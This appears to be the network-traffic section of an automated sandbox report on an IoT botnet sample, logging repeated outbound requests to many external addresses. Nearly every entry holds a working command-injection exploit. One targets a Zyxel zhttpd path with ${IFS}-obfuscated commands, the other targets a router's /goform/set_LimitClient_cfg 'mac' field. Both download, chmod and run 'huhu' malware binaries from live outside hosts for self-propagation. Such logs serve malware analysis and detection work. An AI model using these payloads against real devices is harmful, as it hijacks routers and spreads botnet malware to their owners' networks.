                                              Jan 29, 2024 07:03:27.678493023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              673192.168.2.144708247.185.147.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:27.678522110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              674192.168.2.1453982102.87.221.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:27.678548098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              675192.168.2.144644481.91.159.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:27.678596973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              676192.168.2.1441926200.225.162.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:27.678634882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              677192.168.2.1435728163.143.115.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:27.678673029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              678192.168.2.1446288132.245.37.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:27.678785086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              679192.168.2.1456442204.225.161.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:28.682877064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              680192.168.2.1459596217.99.186.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:28.682919025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              681192.168.2.1434928147.117.0.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:28.682959080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              682192.168.2.1458506195.92.140.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:28.683037996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              683192.168.2.145303614.138.14.2348080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:28.845585108 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:29.141261101 CET35INHTTP/1.0 302 Redirect


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              684192.168.2.143435843.252.157.1388080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.551249027 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:29.941833019 CET118INHTTP/1.1 400
                                              Transfer-Encoding: chunked
                                              Date: Mon, 29 Jan 2024 06:03:28 GMT
                                              Connection: close
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              685192.168.2.144233823.244.221.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685786963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              686192.168.2.1460970216.38.53.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685817003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              687192.168.2.1442708161.217.200.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685827971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              688192.168.2.144417638.16.47.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685867071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              689192.168.2.1454214168.9.69.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685899973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              690192.168.2.1446932112.26.101.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685921907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              691192.168.2.1440232109.80.119.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685934067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              692192.168.2.144545440.73.43.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.685966969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              693192.168.2.1447278116.193.180.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.686013937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              694192.168.2.1434762159.101.63.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.686062098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              695192.168.2.1443612206.16.93.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.686167002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              696192.168.2.145118859.58.50.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:29.686219931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              697192.168.2.144987473.206.115.2258080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:30.045026064 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:30.186321974 CET528INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html
                                              Content-Length: 345
                                              Connection: close
                                              Date: Mon, 29 Jan 2024 06:03:28 GMT
                                              Server: Xfinity Broadband Router Server
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              698192.168.2.14385345.233.43.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694195032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              699192.168.2.1444250158.149.142.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694232941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              700192.168.2.1441482149.94.53.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694257021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              701192.168.2.143342292.116.47.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694327116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              702192.168.2.1455850175.48.16.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694327116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              703192.168.2.145551639.179.72.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694364071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              704192.168.2.1459834197.170.206.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694426060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              705192.168.2.1433274153.197.38.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694492102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              706192.168.2.143323486.176.91.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694530964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              707192.168.2.1444990109.201.131.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694570065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              708192.168.2.143929632.162.5.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694732904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              709192.168.2.145623264.3.168.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:31.694756985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              710192.168.2.144696076.31.225.998080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:32.315686941 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              711192.168.2.145418214.192.21.1348080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:32.350831032 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:33.259545088 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:34.315514088 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:36.427515030 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:40.779236078 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:49.226970911 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
